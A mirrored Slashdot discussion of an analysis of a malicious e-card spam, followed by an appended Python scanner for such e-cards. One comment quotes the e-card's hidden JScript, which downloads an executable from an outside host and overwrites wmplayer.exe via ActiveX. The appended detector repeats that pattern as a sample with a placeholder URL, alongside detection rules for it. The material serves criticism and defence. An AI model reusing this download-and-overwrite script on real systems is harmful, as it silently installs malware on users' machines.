Slashdot Mirror


Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

10 of 482 comments

  1. The most frightening bit here by Rope_a_Dope · · Score: 5, Interesting

    ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an ActiveX control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

    1. Re:The most frightening bit here by CdBee · · Score: 5, Interesting

      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      (MSN) Chatrooms and Windows Update spring to mind as web-based uses of ActiveX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActiveX chatrooms though; I've seen chatroom moderators recommending users to download Mozilla :-)

      One extra worrying thing though: when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActiveX control for the chatroom you have to install Microsoft ActiveX Wrapper for Netscape.

      Potentially, Mozilla users are now affected by ActiveX insecurities if they accept this download.

      --
      I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
    2. Re:The most frightening bit here by lordDallan · · Score: 5, Interesting

      The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

      Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

      If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

  2. Re:e-cards by toasted_calamari · · Score: 5, Interesting

    What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

    With regards to the article, that's definitely one of the nastiest browser exploits I've seen in a long time; it makes me glad I don't use Windows and IE.

  3. Re:You might remember me by ggvaidya · · Score: 5, Interesting
    ... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

    Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

    Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

  4. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 5, Interesting

    That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

  5. Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 5, Interesting
    wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

    I had FILEMON running (it monitors all disk I/O) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

    My solution: I renamed wscript.exe and cscript.exe so they can't execute.

  6. Virus vs. Spam by the+grace+of+R'hllor · · Score: 5, Interesting

    Because Viruses can do better with some effort.

    MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

    E-mail just can't beat those times.

  7. Re:Ugly is what ugly does by JCMay · · Score: 5, Interesting

    What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.

    There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

    There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

  8. Re:Are there really better alternatives??? by orthogonal · · Score: 5, Interesting
    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

    Fire{WHATEVER_WEEK_THIS_IS} doesn't, so far as I know, do this:
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://adversting.co.uk/a.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting data stream as an executable file.

    No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

    Go to web-site, get a new OS!

    And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop to think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag)?

    To the contrary, they considered it a positive feature! Why? Because Visual Basic "programmers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

    Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

    I mean, Christ. This is just a travesty, and an open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, but I never knew JavaScript could be so bad.

    I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

    Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw-up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidentally assigned by Windows to my CD-ROM drive.

    I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

    What the hell?
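An added detection-side example, not from the thread or the analysed article: a Python scan of an HTML mail body for the pattern orthogonal quotes above (ActiveXObject fetching a URL with Microsoft.XMLHTTP, writing the body through ADODB.Stream, SaveToFile onto an executable path), including the case where the script sits in an undisplayed textarea. All function and constant names are mine; the sample e-card is constructed, with a reserved placeholder URL and the wmplayer.exe path quoted in the thread.

```python
import re

# ProgIDs a web page has no business instantiating (lower-cased for matching).
FETCH_PROGIDS = {"microsoft.xmlhttp", "msxml2.xmlhttp", "msxml2.serverxmlhttp"}
SUSPECT_PROGIDS = FETCH_PROGIDS | {"adodb.stream", "wscript.shell",
                                   "scripting.filesystemobject"}
EXEC_SUFFIXES = (".exe", ".dll", ".com", ".scr", ".bat", ".vbs", ".js")

# Textareas are scanned too: the e-card kept its payload in an undisplayed one.
BLOCK_RE = re.compile(r"<(script|textarea)\b([^>]*)>(.*?)</\1>", re.I | re.S)
PROGID_RE = re.compile(r"ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
SAVE_RE = re.compile(r"\.SaveToFile\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
GET_RE = re.compile(r"\.Open\s*\(\s*['\"]GET['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def analyse(html):
    """Return indicators of an ActiveX download-and-overwrite in an HTML body."""
    report = {"progids": set(), "fetch_urls": [], "save_targets": [],
              "hidden_textarea_script": False, "verdict": "clean"}
    for tag, attrs, body in BLOCK_RE.findall(html):
        progids = {p.lower() for p in PROGID_RE.findall(body)}
        report["progids"] |= progids & SUSPECT_PROGIDS
        report["fetch_urls"] += GET_RE.findall(body)
        # JScript source doubles backslashes; collapse them to the real path.
        report["save_targets"] += [p.replace("\\\\", "\\") for p in SAVE_RE.findall(body)]
        if tag.lower() == "textarea" and progids and HIDDEN_RE.search(attrs):
            report["hidden_textarea_script"] = True
    writes_exe = any(t.lower().endswith(EXEC_SUFFIXES) for t in report["save_targets"])
    if report["progids"] & FETCH_PROGIDS and "adodb.stream" in report["progids"] and writes_exe:
        report["verdict"] = "download-and-overwrite"  # fetch + stream + write to an executable
    elif report["progids"]:
        report["verdict"] = "suspicious-activex"
    return report

# Constructed sample modelled on the snippet quoted in the thread; the URL is a
# reserved placeholder, the target path is the one the thread quotes.
SAMPLE_ECARD = r"""<html><body><p>You have received an e-card!</p>
<textarea style="display:none" id="p">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/a.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
</textarea></body></html>"""

if __name__ == "__main__":
    print(analyse(SAMPLE_ECARD))
```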